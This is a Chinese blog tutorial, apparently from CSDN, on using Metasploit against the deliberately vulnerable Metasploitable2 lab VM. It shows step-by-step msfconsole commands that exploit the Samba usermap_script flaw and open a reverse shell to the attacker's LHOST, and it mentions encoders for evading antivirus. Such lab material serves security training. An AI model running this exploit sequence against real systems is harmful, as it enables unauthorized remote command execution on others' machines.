当前位置:网站首页>metasploit渗透
metasploit渗透
2022-04-21 13:32:00 【just a leaf】
前言
metasploit是一个开源工具,旨在方便渗透测测试,由Ruby程序语言编写的模块化框架,具有很好的扩展性,便于渗透测试人员开发
一、Metasploit的模块构成
- Auxliaries(辅助模块)
- Exploit(漏洞利用模块)
- Payload(攻击载荷模块)
- Post(后期渗透模块)
- Encoders(编码工具模块)
二、攻击步骤
- 扫描目标及系统
- 选择并配置一个漏洞利用模块
- 选择并配置一个攻击载荷模块
- 选择一个编码技术,用来绕过杀毒软件的查杀
- 渗透攻击
三、漏洞利用
目标机准备
Metasploitable2是一个主要用于安全工具测试和演示常见漏洞攻击的特别制作的ubuntu操作系统
安装地址如下:
https://information.rapid7.com/download-metasploitable-2017.html
账号密码都为msfadmin登录

利用过程
kali中开启msf
msfconsole

进行靶机版本扫描
nmap -sV ip(这里的ip是靶机的ip)
通过对靶机相关信息的收集然后对exploit和payload进行选择
选取漏洞模块
这里发现开启了samba3.x服务
通过search samba命令查询samba利用漏洞选取合适的漏洞利用模块

这个是按照漏洞利用难度进行排序
这里采用exploit/multi/samba/usermap_script 漏洞利用模块
use exploit/multi/samba/usermap_script
show payload(查看可利用的攻击载荷模块)
show options(可以查看模块利用条件)


这里标有yes的是必须要定义的参数
配置漏洞模块
设置选取的攻击载荷模块
set payload cmd/unix/reverse(这里要注意选择的模块要对应靶机的操作系统这里是Linux)
设置靶机IP
set RHOST 192.168.x.xxx
设置漏洞利用端口号
set RPORT 445
设置发动攻击的主机IP
set LHOST 192.168.x.xxx

进行攻击
设置完参数发动攻击
exploit/run
这里就会在攻击机和目标机之间建立一个shell连接,就可以通过命令进行执行任意命令
然后输入hostname/uname -a/ifconfig…命令即可进行查询
版权声明
本文为[just a leaf]所创,转载请带上原文链接,感谢
https://blog.csdn.net/xiao_he0123/article/details/124273327
边栏推荐
- HCIP之路OSPF拓展配置
- [UVM] multi module env structure
- Build a service registration and Discovery Center
- idea自动生成单元测类
- Go语言 文件操作
- Route selection, anti ring and re release of hcip OSPF
- 一份很棒的外设驱动库!(基于STM32F4)
- Fibonacci sequence
- leetcode:513. Find the value in the lower left corner of the tree [simply BFS find the first one in each layer]
- What are the futures varieties of agricultural products?
猜你喜欢

实战ora2pg迁移oracle11g到pg12.4
![leetcode:513. Find the value in the lower left corner of the tree [simply BFS find the first one in each layer]](/img/be/d026b15f89f39944cf03aa0a05d9e3.png)
leetcode:513. Find the value in the lower left corner of the tree [simply BFS find the first one in each layer]

【csnote】db异常(冗余数据、修改异常、删除异常、插入异常)

Network communication protocol model

Detailed explanation and demonstration of 3-4dom shaped XSS

Small and medium-sized manufacturing enterprises transformation capacity-building sharing

Idea automatically generates unit test classes

海口等保测评公司有几家?具体在哪里?哪里可以查到?

no server suitable for synchronization found

二叉树创建及其线索化
随机推荐
Shell programming learning (II) variables and operations
关于电脑使用慢慢变慢的几大原因分析
HCIP之路ospf的选路,防环,重发布
跑步运动耳机哪个牌子好、适合运动的耳机
(recommended intensive reading) this refers to the north
Internet of things development practice 06 things model: how to define intelligent lights? (study notes)
被迫选择了到了外包公司
Technology giants compete to enter, who can become the "number one player" of the meta universe?
Chris LATTNER, father of llvm: the golden age of compilers
2021-08-10
Read fast RCNN
哈夫曼编码
[digital signal processing] linear constant coefficient difference equation (use matlab to solve the example of "linear constant coefficient difference equation" | a vector analysis | B vector analysi
20210818 diary
English word analysis of communication protocol
MySQL uses PIP and binlog2sql to install
Small and medium-sized manufacturing enterprises transformation capacity-building sharing
MySQL使用安装pip和binlog2sql
【数字信号处理】线性常系数差分方程 ( 根据 “ 线性常系数差分方程 “ 与 “ 边界条件 “ 确定系统是否是 “ 线性时不变系统 “ 案例 | 使用递推方法证明 )
运动耳机什么样的舒服、运动健身耳机推荐

